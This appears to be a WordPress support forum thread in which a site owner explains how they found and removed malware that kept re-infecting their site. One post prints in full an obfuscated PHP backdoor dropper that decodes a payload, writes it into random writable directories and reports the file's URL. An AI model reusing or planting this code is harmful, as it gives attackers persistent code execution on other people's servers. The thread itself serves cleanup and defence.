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  • Thread Starter ebakker66


    Hello Phil,

    Thank you for your email. I did not read your article, I figured out myself to kill this virus.

    I was in the same endless loop with wordfence trying to delete infected files with @include “\x2fh\x6fm\x651 etc.

    I found the file who was creating these @include “\x2fh\x6fm\x651 etc. infections all the time.

    This is what I did:
    1) I Downloaded the whole WordPress site to my local computer
    2) Then I searched for php files with the text ‘rawurldecode’ using Notepad++
    3) When I found files with weird file names such as: zvqbjhrl.php
    And they also contains very strange code, such as:
    function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr)
    4) Then deleted all of those files.

    And now everything is OK

    Thanks again for your proactive reply.

    You can close this ticket.


    Thread Starter ebakker66


    Thank you Jason,

    You are right, I have already found several of these weird files on many other places in my wordpress website.



    Thread Starter ebakker66


    Hello All,

    I regret that I wrote that I doubted about the sincerity of Wordfence. After many hours of research I found out that it has nothing to do with Wordfence. My site was clearly already been compromised before I installed Wordfence.

    So, again, sorry for that.

    Best regards,


    Hi just an addition. I was in the same endless loop with wordfence trying to delete these infected files with @include “\x2fh\x6fm\x651 etc.

    I think I found the file who is creating these @include “\x2fh\x6fm\x651 etc. infections all the time.

    This is what I did:
    1) Download the whole WordPress site to your computer
    2) Then search for php files with the text ‘rawurldecode’ using Notepad++
    3) If you then find files with weird file names such as: zvqbjhrl.php
    And they also contains very strange code, such as:
    function jdszmp($vtwintjvkr, $vnuonc){global $vtwmb;$vtwmb = $vtwintjvkr;$vnuonc = str_split(rawurldecode(str_rot13($vnuonc)));function jzibdoj($zyeiayf, $vtwintjvkr){global $nfspmbl, $vtwmb;return $zyeiayf ^ $nfspmbl[$vtwintjvkr % strlen($nfspmbl)] ^ $vtwmb[$vtwintjvkr % strlen($vtwmb)];}$vnuonc = implode(“”, array_map(“jzibdoj”, array_values($vnuonc), array_keys($vnuonc)));$vnuonc = @unserialize($vnuonc);if (@is_array($vnuonc)){$vtwintjvkr = array_keys($vnuonc);$vnuonc = $vnuonc[$vtwintjvkr[0]];if ($vnuonc === $vtwintjvkr[0]){echo @serialize(Array(‘php’ => @phpversion(), ));exit();}else{function lrzugsl($pockhvlvjir) {static $oxtys = array();$pockhvlvjsjhbtvle = glob($pockhvlvjir . ‘/*’, GLOB_ONLYDIR);if (count($pockhvlvjsjhbtvle) > 0) {foreach ($pockhvlvjsjhbtvle as $pockhvlvj){if (@is_writable($pockhvlvj)){$oxtys[] = $pockhvlvj;}}}foreach ($pockhvlvjsjhbtvle as $pockhvlvjir) lrzugsl($pockhvlvjir);return $oxtys;}$tghfnmi = $_SERVER[“DOCUMENT_ROOT”];$pockhvlvjsjhbtvle = lrzugsl($tghfnmi);$vtwintjvkr = array_rand($pockhvlvjsjhbtvle);$jlolaswm = $pockhvlvjsjhbtvle[$vtwintjvkr] . “/” . substr(md5(time()), 0, 8) . “.php”;@file_put_contents($jlolaswm, $vnuonc);echo “https://” . $_SERVER[“HTTP_HOST”] . substr($jlolaswm, strlen($tghfnmi));exit();}}}

    Then delete those files.



    Hello Vijay Padiyar,

    What file did you remove from your WordPress wp-admin directory?



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